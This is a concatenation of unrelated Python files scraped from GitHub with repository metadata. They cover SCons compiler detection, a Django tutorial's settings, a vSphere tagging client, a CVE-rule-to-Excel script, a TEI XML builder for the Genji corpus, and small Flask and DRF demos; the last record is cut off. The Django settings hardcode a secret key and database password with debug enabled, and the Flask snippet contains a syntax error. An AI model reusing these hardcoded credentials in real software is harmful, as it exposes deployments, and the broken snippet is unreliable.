ee8b3323e5379d9b8638bc70813f9fd8634ea62e | 362b8828ad4a79fe899d2b66ce2f5c516f338f20 | /python-solutions/classRoomHandsOn-Day02/04.py | 990c7a80933e273358446767c5c97609f64692d5 | [] | no_license | Snehagovindharajan/GraduateTrainingProgram2019 | 770e888c2615de438bab5899cf2b4331582b4803 | 019a8fdbd5d372b6914be9f5f6427cfc034c761f | refs/heads/master | 2020-07-07T00:58:02.652838 | 2019-12-27T11:06:20 | 2019-12-27T11:06:20 | 203,193,092 | 0 | 1 | null | 2019-08-19T14:49:51 | 2019-08-19T14:49:51 | null | UTF-8 | Python | false | false | 429 | py | # Write a program which accepts a sequence of comma-separated numbers from console and generate a list and a tuple
# which contains every number. Suppose the following input is supplied to the program: 34,67,55,33,12,98 Then,
# the output should be: ['34', '67', '55', '33', '12', '98'] ('34', '67', '55', '33', '12', '98')
lst = [i for i in input().split(',')]
print("List : ",lst)
tuple1 = tuple(lst)
print("Tuple : ",tuple1)
| [
"snehag2205@gmail.com"
] | snehag2205@gmail.com |
ef89ebbee0f0db544ff5bf1b817aff77405ecae0 | 7d274ce8dae971228a23157a409b561020c22f66 | /tools/packages/SCons/Tool/sunc++.py | 00fb8c85284d59226fd62f3cfb8e577783661690 | [] | no_license | Eigenlabs/EigenD-Contrib | a212884d4fdf9ae0e1aeb73f6311606212e02f94 | 586fe17471571802295c792697f255e6cab51b17 | refs/heads/master | 2020-05-17T07:54:48.668925 | 2013-02-05T10:20:56 | 2013-02-05T10:20:56 | 3,239,072 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,744 | py | """SCons.Tool.sunc++
Tool-specific initialization for C++ on SunOS / Solaris.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/sunc++.py 4577 2009/12/27 19:43:56 scons"
import SCons
import os
import re
import subprocess
cplusplus = __import__('c++', globals(), locals(), [])
package_info = {}
def get_package_info(package_name, pkginfo, pkgchk):
try:
return package_info[package_name]
except KeyError:
version = None
pathname = None
try:
sadm_contents = open('/var/sadm/install/contents', 'r').read()
except EnvironmentError:
pass
else:
sadm_re = re.compile('^(\S*/bin/CC)(=\S*)? %s$' % package_name, re.M)
sadm_match = sadm_re.search(sadm_contents)
if sadm_match:
pathname = os.path.dirname(sadm_match.group(1))
try:
p = subprocess.Popen([pkginfo, '-l', package_name],
stdout=subprocess.PIPE,
stderr=open('/dev/null', 'w'))
except EnvironmentError:
pass
else:
pkginfo_contents = p.communicate()[0]
version_re = re.compile('^ *VERSION:\s*(.*)$', re.M)
version_match = version_re.search(pkginfo_contents)
if version_match:
version = version_match.group(1)
if pathname is None:
try:
p = subprocess.Popen([pkgchk, '-l', package_name],
stdout=subprocess.PIPE,
stderr=open('/dev/null', 'w'))
except EnvironmentError:
pass
else:
pkgchk_contents = p.communicate()[0]
pathname_re = re.compile(r'^Pathname:\s*(.*/bin/CC)$', re.M)
pathname_match = pathname_re.search(pkgchk_contents)
if pathname_match:
pathname = os.path.dirname(pathname_match.group(1))
package_info[package_name] = (pathname, version)
return package_info[package_name]
# use the package installer tool lslpp to figure out where cppc and what
# version of it is installed
def get_cppc(env):
cxx = env.subst('$CXX')
if cxx:
cppcPath = os.path.dirname(cxx)
else:
cppcPath = None
cppcVersion = None
pkginfo = env.subst('$PKGINFO')
pkgchk = env.subst('$PKGCHK')
for package in ['SPROcpl']:
path, version = get_package_info(package, pkginfo, pkgchk)
if path and version:
cppcPath, cppcVersion = path, version
break
return (cppcPath, 'CC', 'CC', cppcVersion)
def generate(env):
"""Add Builders and construction variables for SunPRO C++."""
path, cxx, shcxx, version = get_cppc(env)
if path:
cxx = os.path.join(path, cxx)
shcxx = os.path.join(path, shcxx)
cplusplus.generate(env)
env['CXX'] = cxx
env['SHCXX'] = shcxx
env['CXXVERSION'] = version
env['SHCXXFLAGS'] = SCons.Util.CLVar('$CXXFLAGS -KPIC')
env['SHOBJPREFIX'] = 'so_'
env['SHOBJSUFFIX'] = '.o'
def exists(env):
path, cxx, shcxx, version = get_cppc(env)
if path and cxx:
cppc = os.path.join(path, cxx)
if os.path.exists(cppc):
return cppc
return None
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| [
"jim@eigenlabs.com"
] | jim@eigenlabs.com |
b6f5269544504643167d88068a179f4d257d958c | 0b81ac4f400a0880ca8fa48886c6928822cd42f4 | /Code/1- Getting Started/Start/storefront2/storefront/settings.py | 520a04eb9189e33510eb3b73609781dbe96b8278 | [] | no_license | ojaoc/Django-MoshHamedani-Part2 | 850828d6cc6cee2a50f2f84e9c36fcc2c066dc64 | 0c63833de4e7fa66eeb51964df716dca5d8d470d | refs/heads/master | 2023-07-31T10:21:37.827555 | 2021-10-03T13:12:44 | 2021-10-03T13:12:44 | 409,772,085 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,622 | py | """
Django settings for storefront project.
Generated by 'django-admin startproject' using Django 3.2.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = "django-insecure-hs6j037urx6iav+7#10%-vu4l4f5@@-1_zo)oft4g7$vf2$jmp"
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.sessions",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.messages",
"django.contrib.staticfiles",
"rest_framework",
"playground",
"debug_toolbar",
"store",
"store_custom",
"tags",
"likes",
]
MIDDLEWARE = [
"debug_toolbar.middleware.DebugToolbarMiddleware",
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
INTERNAL_IPS = [
# ...
"127.0.0.1",
# ...
]
ROOT_URLCONF = "storefront.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
WSGI_APPLICATION = "storefront.wsgi.application"
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.mysql",
"NAME": "storefront2",
"HOST": "localhost",
"USER": "django.storefront",
"PASSWORD": "password",
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = "/static/"
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = "django.db.models.BigAutoField"
REST_FRAMEWORK = {"COERCE_DECIMAL_TO_STRING": False}
| [
"correia.jafonso@gmail.com"
] | correia.jafonso@gmail.com |
dbd8e45621f1bb91a4e6dec314813333eca56509 | 30e2fd75141ef6b200b9b7d038fa154af183df3d | /paparajotes_y_bellotas/conftest.py | 7a3969f7c42ca02cf06c4fae9ea69dd8fb5a81bc | [
"MIT"
] | permissive | palvarez89/paparajotesybellotas | 7ee6c2f881ada3b69b40cb9ee6418b9f0cf16aab | 0600b4bc5cd9962d1ce6425ceb0db173f7d32b71 | refs/heads/master | 2022-05-01T07:13:29.513604 | 2019-09-10T15:50:59 | 2019-09-10T15:50:59 | 159,998,294 | 0 | 0 | MIT | 2022-04-22T21:25:24 | 2018-12-01T23:59:24 | CSS | UTF-8 | Python | false | false | 436 | py | import pytest
from django.conf import settings
from django.test import RequestFactory
from paparajotes_y_bellotas.users.tests.factories import UserFactory
@pytest.fixture(autouse=True)
def media_storage(settings, tmpdir):
settings.MEDIA_ROOT = tmpdir.strpath
@pytest.fixture
def user() -> settings.AUTH_USER_MODEL:
return UserFactory()
@pytest.fixture
def request_factory() -> RequestFactory:
return RequestFactory()
| [
"palvarez89@gmail.com"
] | palvarez89@gmail.com |
c417369002aaab9703e24ab5f01270d20b30868a | 5090ee217ce19d912ff91715ed1d01dfd3511f02 | /actions/vmwarelib/tagging.py | a4061b7eeba904a36fdde9803d647d6e0f32ce6d | [
"Apache-2.0"
] | permissive | jschoewe/stackstorm-vsphere | a12e7a7f570504ff65da47763e6032174b9de538 | db822e9c3b05d939053dafaeed2f0bf81384abd0 | refs/heads/master | 2020-04-28T12:57:00.884520 | 2020-03-10T15:06:00 | 2020-03-10T15:06:00 | 175,292,523 | 0 | 0 | Apache-2.0 | 2020-03-10T15:06:01 | 2019-03-12T20:37:20 | Python | UTF-8 | Python | false | false | 9,142 | py | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class VmwareTagActions(object):
# vSphere Automation API (6.5)
# API Reference: https://code.vmware.com/web/dp/explorer-apis?id=191
def __init__(self, session, url_base):
self.session = session
self.url_base = url_base
############################################################################
# Request Actions
def make_url(self, endpoint):
return self.url_base + endpoint
def get(self, endpoint):
url = self.make_url(endpoint)
response = self.session.get(url)
response.raise_for_status()
return response.json()
def post(self, endpoint, payload=None):
url = self.make_url(endpoint)
response = self.session.post(url, json=payload)
response.raise_for_status()
if response.text:
return response.json()
return None
def delete(self, endpoint, payload=None):
url = self.make_url(endpoint)
response = self.session.delete(url, json=payload)
response.raise_for_status()
if response.text:
return response.json()
return None
############################################################################
# Category Functions
def category_list(self):
response = self.get("/rest/com/vmware/cis/tagging/category")
return response['value']
def category_get(self, category_id):
response = self.get("/rest/com/vmware/cis/tagging/category/id:{}".format(category_id))
return response['value']
def category_delete(self, category_id):
response = self.delete("/rest/com/vmware/cis/tagging/category/id:{}".format(category_id))
return response
def category_find_by_name(self, name):
category_id_list = self.category_list()
for category_id in category_id_list:
category = self.category_get(category_id)
if category["name"] == name:
return category
return None
def category_create_spec(self):
return {"name": "",
"description": "",
"cardinality": "SINGLE", # "SINGLE", "MULTIPLE"
"associable_types": ["VirtualMachine"]} # One or more VMWARE_OBJECT_TYPES
def category_create(self, name, description=None, cardinality=None,
associable_types=None):
create_spec = self.category_create_spec()
create_spec['name'] = name
if description:
create_spec['description'] = description
if cardinality:
create_spec['cardinality'] = cardinality
if associable_types is not None:
create_spec['associable_types'] = associable_types
response = self.post("/rest/com/vmware/cis/tagging/category",
payload={'create_spec': create_spec})
return response['value']
def category_get_or_create(self, name, description=None, cardinality=None,
associable_types=None):
category = self.category_find_by_name(name)
if not category:
# on success this returns the new category's id
category_id = self.category_create(name, description, cardinality, associable_types)
category = self.category_get(category_id)
return category
############################################################################
# Tag Functions
def tag_list(self, category_id=None):
# Return all tags from the given category, or all tags from all categories
if category_id:
response = self.post("/rest/com/vmware/cis/tagging/tag/id:{}?~action="
"list-tags-for-category".format(category_id))
else:
response = self.get("/rest/com/vmware/cis/tagging/tag")
return response["value"]
def tag_get(self, tag_id):
response = self.get("/rest/com/vmware/cis/tagging/tag/id:{}".format(tag_id))
return response['value']
def tag_delete(self, tag_id):
response = self.delete("/rest/com/vmware/cis/tagging/tag/id:{}".format(tag_id))
return response
# If a category ID is not given then this will return the first tag it finds with the given name
def tag_find_by_name(self, name, category_id=None):
tag_id_list = self.tag_list(category_id)
for tag_id in tag_id_list:
tag = self.tag_get(tag_id)
if tag['name'] == name:
return tag
return None
def tag_create_spec(self):
return {"name": "",
"description": "",
"category_id": ""}
def tag_create(self, name, category_id, description=None):
create_spec = self.tag_create_spec()
create_spec["name"] = name
create_spec["category_id"] = category_id
if description:
create_spec["description"] = description
response = self.post("/rest/com/vmware/cis/tagging/tag",
payload={"create_spec": create_spec})
return response["value"]
# This does not create a new category, it will fail if the given category ID doesn't exist
def tag_get_or_create(self, name, category_id, description=None):
tag = self.tag_find_by_name(name, category_id)
if not tag:
# on success this returns the new tag's id
created_tag_id = self.tag_create(name, category_id, description)
tag = self.tag_get(created_tag_id)
return tag
############################################################################
# Tag Association Functions
def tag_association_endpoint(self, action, tag_id=None):
if tag_id:
return "/rest/com/vmware/cis/tagging/tag-association/id:{}?~action={}".format(tag_id,
action)
else:
return "/rest/com/vmware/cis/tagging/tag-association?~action={}".format(action)
def tag_association_attach(self, tag_id, obj_type, obj_id):
return self.post(self.tag_association_endpoint("attach", tag_id),
payload={"object_id": {"id": obj_id,
"type": obj_type}})
def tag_association_attach_multiple(self, tag_ids, obj_type, obj_id):
return self.post(self.tag_association_endpoint("attach-multiple-tags-to-object"),
payload={"tag_ids": tag_ids,
"object_id": {"id": obj_id,
"type": obj_type}})
def tag_association_detach(self, tag_id, obj_type, obj_id):
return self.post(self.tag_association_endpoint("detach", tag_id),
payload={"object_id": {"id": obj_id,
"type": obj_type}})
def tag_association_list_attached_tags(self, obj_type, obj_id):
response = self.post(self.tag_association_endpoint("list-attached-tags"),
payload={"object_id": {"id": obj_id,
"type": obj_type}})
return response['value']
def tag_association_list_attached_objects(self, tag_id):
response = self.post(self.tag_association_endpoint("list-attached-objects",
tag_id))
return response['value']
def tag_association_detach_category(self, category_id, obj_type, obj_id):
# get all tags for this object
tag_id_list = self.tag_association_list_attached_tags(obj_type, obj_id)
# if the tag's category matches category_id then detach the tag
results = []
for tag_id in tag_id_list:
tag = self.tag_get(tag_id)
if tag['category_id'] == category_id:
self.tag_association_detach(tag_id, obj_type, obj_id)
results.append(tag)
return results
def tag_association_replace(self, tag_id, obj_type, obj_id):
# remove all tags
tag = self.tag_get(tag_id)
self.tag_association_detach_category(tag['category_id'], obj_type, obj_id)
# attach the provided tag in this category to the object
return self.tag_association_attach(tag_id, obj_type, obj_id)
| [
"john.schoewe@encore.tech"
] | john.schoewe@encore.tech |
29e3a9b62615e575e92f4df9dfc8008797700006 | 23c3b980df2cb37928ddf430ed62c1b4de7d4a9a | /ParseJsonOld.py | 6258be6d11875a09222d6de57e659c9c99075e55 | [] | no_license | DeviceObject/PythonCode | 6a95eb59fc33b218d5f930780eb73df7f06760e6 | 24191bc099c28333f976cbbc06b255e156e7da78 | refs/heads/master | 2022-10-17T22:03:26.913913 | 2022-10-12T02:46:01 | 2022-10-12T02:46:01 | 92,244,336 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,708 | py | import os
import json
import urllib
import xlrd
import xlwt
import time
from xlutils.copy import copy
def write_excel(excel_file, write_data):
if not os.path.exists(excel_file):
line_title = ["RuleId", "CVE Number", "CWE", "BID", "Descript"]
new_file = xlwt.Workbook(encoding='utf-8')
new_sheet = new_file.add_sheet('RuleInfo',cell_overwrite_ok = True)
for i in range(len(line_title)):
if line_title[i] == "CVE Number" and line_title[i] == "Descript":
new_sheet.write(0, i, line_title[i], set_style('Times New Roman', 500 , True))
else:
new_sheet.write(0, i, line_title[i], set_style('Times New Roman', 300 , True))
for i in range(len(write_data)):
new_sheet.write(1, i, write_data[i])
new_file.save(excel_file)
else:
workbook = xlrd.open_workbook(excel_file)
sheets = workbook.sheet_names()
worksheet = workbook.sheet_by_name(sheets[0])
rows_old = worksheet.nrows
new_workbook = copy(workbook)
new_worksheet = new_workbook.get_sheet(0)
for i in range(len(write_data)):
new_worksheet.write(rows_old, i, write_data[i])
new_workbook.save(excel_file)
def set_style(name, height, bold = False):
style = xlwt.XFStyle()
font = xlwt.Font()
font.name = name
font.bold = bold
font.color_index = 4
font.height = height
style.font = font
return style
def search_signature(origal_data, start_signature, endsignature):
find_signature = []
cur_origal_data = origal_data
while (True):
index = cur_origal_data.find(start_signature)
if index == -1:
break
sub_index = cur_origal_data[index:].find(endsignature)
if sub_index == -1:
break
find_signature.append(cur_origal_data[index + len(start_signature):index + sub_index])
cur_origal_data = cur_origal_data[index + sub_index:]
return find_signature
def fetch_cve_number(input_json_file, output_file):
if not os.path.exists(input_json_file):
print("json file isn't exist")
return False
with open(input_json_file, 'r', encoding='utf-8') as file_json:
file_data = file_json.read()
file_json.close()
json_data = json.loads(file_data)
for item in json_data.items():
origal_id = item[0]
for sub_item in item[1].items():
if sub_item[0] == "product_feature":
for third_item in sub_item[1].items():
rule_type = third_item[0]
if third_item[0] == "agentless":
continue
# elif third_item[0] == "agent_windows":
# continue
# elif third_item[0] == "agent_linux":
# continue
# else:
# print("unknow platfrom")
for fourth_item in third_item[1].items():
if fourth_item[0] == "platform":
platform = fourth_item[1]
elif fourth_item[0] == "cvss":
cvss = fourth_item[1]
elif fourth_item[0] == "orig_rule":
origal_rule = fourth_item[1]
cve_list = []
cve_list = search_signature(origal_rule, "reference:cve,", ";")
cve_name = ""
for cve_item in cve_list:
cve_name = cve_name + "CVE-" + cve_item + " "
elif fourth_item[0] == "desc_zh":
rule_desc = fourth_item[1]
elif fourth_item[0] == "rule_id":
rule_id = fourth_item[1]
else:
#print(str(fourth_item[0]) + " " + str(fourth_item[1]))
cwe_name = ""
bid_name = ""
write_data = []
write_data.append(rule_id)
write_data.append(cve_name)
write_data.append(cwe_name)
write_data.append(bid_name)
write_data.append(rule_desc)
write_excel(output_file, write_data)
#rule_info = str(origal_id) + " " + str(rule_id) + " " + rule_type + " " + platform + " " + cvss + " " + cve_name + " " + rule_desc
print(str(rule_id))
return True
if __name__ == "__main__":
fetch_cve_number(os.sys.argv[1], os.path.join(os.getcwd(), "New_Output.xls"))
| [
"deviceobject@gmail.com"
] | deviceobject@gmail.com |
3b4f8d5f9825913e31189eddb81b7034aebe454f | 46669c775591b38f71382f690cb93a4879366595 | /src/020_create_xml.py | 2cdeed0319fdbdfe0862a1c99e4fb20e25ad7850 | [
"CC-BY-4.0"
] | permissive | kouigenjimonogatari/kouigenjimonogatari.github.io | e234abe0e4145bbe879756f6af19a546c01a2ff4 | c0ec798d550bda5670d8af15c4028ff925e6495d | refs/heads/master | 2022-10-12T19:52:05.229525 | 2022-10-04T09:34:51 | 2022-10-04T09:34:51 | 223,747,725 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,077 | py | import sys
import urllib
import json
import argparse
import urllib.request
import unicodedata
import collections
import os
import xml.etree.ElementTree as ET
import csv
import glob
import urllib.parse
def get_mdata(manifest):
print(manifest)
res = urllib.request.urlopen(manifest)
# json_loads() でPythonオブジェクトに変換
data = json.loads(res.read().decode('utf-8'))
canvases = data["sequences"][0]["canvases"]
map = {}
for i in range(len(canvases)):
canvas = canvases[i]
canvas_id = canvas["@id"]
width = canvas["width"]
height = canvas["height"]
url = canvas["images"][0]["resource"]["@id"]
map[canvas_id] = {
"width": width,
"height": height,
"url": url
}
return map
vols = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12 ,13, 14, 15, 16, 17, 18, 19, 20,
21, 22, 23, 24, 25, 26, 27, 28, 29, 30,
31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50,
51, 52, 53, 54]
m_map = {}
for vol in vols:
prefix = ".//{http://www.tei-c.org/ns/1.0}"
xml = ".//{http://www.w3.org/XML/1998/namespace}"
tmp_path = "data/template.xml"
tree = ET.parse(tmp_path)
ET.register_namespace('', "http://www.tei-c.org/ns/1.0")
ET.register_namespace('xml', "http://www.w3.org/XML/1998/namespace")
root = tree.getroot()
para = root.find(prefix + "body").find(prefix + "p")
files = glob.glob("../api/items/*.json")
surfaceGrp = root.find(prefix+"surfaceGrp")
with open("../api/item_sets/"+str(vol).zfill(2)+".json", 'r') as f:
rdf_collection = json.load(f)
manifest = rdf_collection[0]["http://www.w3.org/2000/01/rdf-schema#seeAlso"][0]["@id"]
title = rdf_collection[0]["http://www.w3.org/2000/01/rdf-schema#label"][0]["@value"]
surfaceGrp.set("facs", manifest)
if manifest not in m_map:
m_map[manifest] = get_mdata(manifest)
canvas_data = m_map[manifest]
prev_page = -1
canvas_map = {}
for file in sorted(files):
with open(file, 'r') as f:
data = json.load(f)
# print(file)
value = data[0]["http://www.w3.org/2000/01/rdf-schema#label"][0]["@value"]
# if "http://example.org/冊数名" not in data[0]:
# continue
vol_ = int(data[0]["http://purl.org/dc/terms/isPartOf"][0]["@id"].split("/")[-1].split(".")[0])
if vol != vol_:
continue
root.find(prefix + "title").text = "校異源氏物語・"+ title
id = data[0]["@id"]
page = data[0]["https://w3id.org/kouigenjimonogatari/api/property/page"][0]["@value"]
# 新しい頁
if page != prev_page:
prev_page = page
lb = ET.Element(
"{http://www.tei-c.org/ns/1.0}lb")
para.append(lb)
pb = ET.Element(
"{http://www.tei-c.org/ns/1.0}pb")
pb.set("n", str(page))
pb.set("facs", "#zone_"+str(page).zfill(4))
para.append(pb)
relation = data[0]["http://purl.org/dc/terms/relation"][0]["@id"]
relation = urllib.parse.unquote(relation)
canvas_id = relation.split("canvas=")[1]
obj = canvas_data[canvas_id]
if canvas_id not in canvas_map:
canvas_map[canvas_id] = {
"url": obj["url"],
"zones": []
}
if page % 2 == 0:
lrx = obj["width"]
ulx = int(lrx / 2)
else:
lrx = int(obj["width"] / 2)
ulx = 0
zone = ET.Element(
"{http://www.tei-c.org/ns/1.0}zone")
zone.set("xml:id", "zone_"+str(page).zfill(4))
zone.set("lrx", str(lrx))
zone.set("lry", str(obj["height"]))
zone.set("ulx", str(ulx))
zone.set("uly", str(0))
canvas_map[canvas_id]["zones"].append(zone)
lb = ET.Element(
"{http://www.tei-c.org/ns/1.0}lb")
para.append(lb)
line = ET.Element(
"{http://www.tei-c.org/ns/1.0}seg")
line.set("corresp", id)
line.text = value
# para.append(line)
para.append(line)
for canvas_id in canvas_map:
obj = canvas_map[canvas_id]
surface = ET.Element(
"{http://www.tei-c.org/ns/1.0}surface")
surfaceGrp.append(surface)
graphic = ET.Element(
"{http://www.tei-c.org/ns/1.0}graphic")
graphic.set("n", canvas_id)
graphic.set("url", obj["url"])
surface.append(graphic)
for zone in obj["zones"]:
surface.append(zone)
tree.write("../tei/"+str(vol).zfill(2)+".xml", encoding="utf-8")
| [
"na.kamura.1263@gmail.com"
] | na.kamura.1263@gmail.com |
1345771bc1b47bd1670f09a40a36343b34214e39 | f3110c8d0d1a232a0511ec559695882c1eb8594e | /DJANGO/quiz/views.py | 884b75847a4fa12c352577e3ce03ff8523cc36d7 | [] | no_license | SeungWookHan/Flutter-DRF | feb1394d52961824eac2a6e88c667a0e03375c47 | c793ccdacee1a4053a33471c226ff2ce8c5797dc | refs/heads/master | 2023-02-04T23:15:45.945139 | 2020-12-29T15:50:02 | 2020-12-29T15:50:02 | 324,955,539 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 570 | py | from rest_framework.response import Response
from rest_framework.decorators import api_view
from .models import Quiz
from .serializers import QuizSerializer
import random
# Create your views here.
@api_view(['GET'])
def helloAPI(request):
return Response("hello world!")
@api_view(['GET'])
def randomQuiz(request, id):
totalQuizs = Quiz.objects.all()
randomQuizs = random.sample(list(totalQuizs), id)
serializer = QuizSerializer(randomQuizs, many=True) #many 부분을 통해 다량의 데이터도 직렬화 진행
return Response(serializer.data) | [
"hswook12@me.com"
] | hswook12@me.com |
fd3c07e0d681e20aeacc974d84e95c92b8462904 | a08ea65c1ef699171e11c10da75f8291cb0c743c | /JSON work 28/app.py | 902f284a1f33ee91f4953513b256f50f2d70a30d | [] | no_license | hussainMansoor876/Numpy-And-Falsk-Exercise | 476551257d940965eadbea27f5c61d978475ed1f | 1930dee5ac07dc9a18c30c45e196060cf73095d0 | refs/heads/master | 2020-03-28T19:23:50.718360 | 2018-09-16T07:17:39 | 2018-09-16T07:17:39 | 148,971,926 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | py | from flask import Flask, jsonify
app=Flask(__name__)
@app.route("/")
def index():
stud=[{'name':'mansoor','age':19},
{'name':'Qasim','age':23}]
return jsonify({'stud':stud})
app.run(host='0.0.0.0' , port='3000' debug=True) | [
"“hussainmansoor876@gmail.com”"
] | “hussainmansoor876@gmail.com” |
ba1076a3246d6802d9ea52c4729fe3b0503f4722 | 60448d1467b5a2531bab91e8bc721294a397e754 | /nmrpyschedule/generator.py | 6ae0f758186b260b88d0c9eb2eb10be36e7e9cae | [] | no_license | mattfenwick/NMRPySchedule | 8c7fda460b32f09138f08f15d302df4096075fb9 | 22e3399e9964137cb3e382b5805d457bb82e751f | refs/heads/master | 2021-01-18T16:32:23.013635 | 2013-06-11T15:36:29 | 2013-06-11T15:36:29 | 10,610,035 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,688 | py | '''
@author: matt
'''
import itertools
import math
def uniform(ranges):
'''
Generate a table of n-dimensional points containing all grid points within the given ranges.
Includes both boundaries.
'''
theNums = [range(low, high + 1) for (low, high) in ranges]
return itertools.product(*theNums)
_primes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]
def _haltonNumber(index, base):
result = 0
f = 1. / base
i = index
while i > 0:
result = result + f * (i % base)
i = int(i / base)
f = f / base
return result
def _scaledHaltonNumber(factor, shift, index, prime):
return int(factor * _haltonNumber(index, prime)) + shift
def halton(ranges):
'''
Generate subrandom sequence of n-dimensional points according to the Halton sequence.
Returns a generator of an infinite sequence.
'''
scalingFactors = [max(x) - min(x) for x in ranges]
shifts = [min(x) for x in ranges]
if len(ranges) > len(_primes):
raise ValueError("not enough primes defined: please define more or reduce the dimensionality")
ix = 0
while True:
pt = []
for (sf, s, p) in zip(scalingFactors, shifts, _primes):
pt.append(_scaledHaltonNumber(sf, s, ix, p))
yield pt
ix += 1
def _distance(pt, origin):
zipped = zip(pt, origin)
sumSquares = sum([abs(a - b) ** 2 for (a, b) in zipped])
dist = math.sqrt(sumSquares)
return dist
def _myDist(pt, origin, width, maxDeviation):
dist = _distance(pt, origin)
ratio = dist / width
return abs(ratio - round(ratio)) * width <= maxDeviation
def concentricShell(ranges, shellSpacing, maxDeviation):
'''
Generate all points whose distance from the origin is close to a multiple
of an arbitrary number. The origin is defined as the point whose coordinates
are the low end of each dimension's range.
'''
points = uniform(ranges)
origin = [r[0] for r in ranges]
return [pt for pt in points if _myDist(pt, origin, shellSpacing, maxDeviation)]
def _myFilter(pt, origin, offsetAngle, degreeGap, tolerance):
y,x = pt[0] - origin[0], pt[1] - origin[1]
theta = m.atan2(x, y) * 180. / m.pi # angle in degrees
ratio = (theta + offsetAngle) / degreeGap
return abs(ratio - round(ratio)) * degreeGap < tolerance
def radial(ranges, offsetAngle, gapAngle, maximumDeviation):
'''
Generate coordinates of points, where the points lie along 'spokes' radiating out from the origin.
'''
allPoints = uniform(ranges)
origin = [r[0] for r in ranges]
return [pt for pt in allPoints if _myFilter(pt, origin, offsetAngle, gapAngle, maximumDeviation)]
| [
"mfenwick100@gmail.com"
] | mfenwick100@gmail.com |
66c71b03c28c724553f740d6e72d6d54448e2888 | 9b64f0f04707a3a18968fd8f8a3ace718cd597bc | /huaweicloud-sdk-bcs/huaweicloudsdkbcs/v2/model/show_blockchain_detail_request.py | 0799bf411b855abd953b527d517b0231e35885cf | [
"Apache-2.0"
